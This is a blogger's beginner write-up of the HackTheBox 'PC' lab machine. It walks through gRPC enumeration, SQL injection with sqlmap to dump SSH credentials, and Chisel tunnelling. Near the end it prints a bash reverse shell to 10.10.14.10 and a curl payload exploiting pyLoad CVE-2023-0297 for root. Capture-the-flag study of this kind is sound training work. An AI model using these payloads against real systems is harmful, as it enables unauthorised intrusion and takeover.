HackTheBox Writeup — PC

Dicky Aditrianza
4 min readJun 4, 2023

--

Hello everyone, I’m a beginner here! I’m trying to write a write-up on an HTB machine again.

First things first, I performed port scanning and found that only 2 ports are open. These include port 22, which is SSH, and port 50051, which I have no idea about its purpose.

nmap -p- -sC -sV --min-rate 5000 10.10.11.214 -oN nmappc -Pn

And I decided to look at the HTTP site but found nothing there.

Thus, I did some research on Google and noticed that port 50051 is the default port for the gRPC channel.

https://documentation.softwareag.com/webmethods/compendiums/v10-11/C_API_Management/index.html#page/api-mgmt-comp/to-grpc_configuration_7.html

And then, I found a way to access the server using tools called grpcui or gRPC UI.

https://github.com/fullstorydev/grpcui

First, install it. Then, access the server using this command:

grpcui -plaintext 10.10.11.214:50051

and it will automatically open up a web page.

After playing around with the UI interface, I realized that I can request the data using the credentials “admin:admin”. This resulted in a response with a user token and an ID number.

Thence, I started intercepting using Burp Suite with the token and ID in the method getInfo().

I realized there might be an SQL injection vulnerability in the parameter “id,” but again, I have no idea how to exploit it or take any further action.

Therefore, I saved the request and named it “sqli.req,” although the file name is actually optional.

And I used SQLmap to perform a POST request injection using the saved request.

sqlmap -r sqli.req --dump

And tadaa! I obtained valid SSH credentials.

Login using SSH with the obtained credentials.

Privilege Escalation

Using linpeas.sh, I found no interesting binaries, CVEs, or other noteworthy findings. However, I did identify an active port, which is port 8000.

Thus, I attempted to access it using Chisel. I transferred Chisel from my local machine to the target machine and ran the following command on my local machine:

chisel server -p 3477 --reverse

And on the target machine, run the following command:

./chisel client 10.10.14.10:3477 R:8000:127.0.0.1:8000/tcp

Access the server on the browser by entering the following URL: http://127.0.0.1:8000/

nce again, Google proves to be the key to everything on this machine. After trying default credentials without success, I conducted a search for vulnerabilities and discovered that pyLoad has a vulnerability (CVE-2023–0297) in this case.

The vulnerability suggests that it can exploit the code using the following command:

https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad

Create a bash script named “bash.sh” on the target machine that contains the code for a reverse shell connecting back to my local machine.

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.10/1337 0>&1

And set up a listener on port 1337 on local machine.

nc -nvlp 1337

Make slight modifications to the command or exploit code, and execute it on the target machine:

curl -i -s -k -X $'POST' \
--data-binary $'jk=pyimport%20os;os.system(\"bash%20/tmp/bash.sh\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
$'http://127.0.0.1:8000/flash/addcrypted2'

This will execute the “bash.sh” script on the target machine, thereby creating a reverse shell connection to my local machine.

Now it’s done, the machine is rooted. Thank you for reading! :)

--

--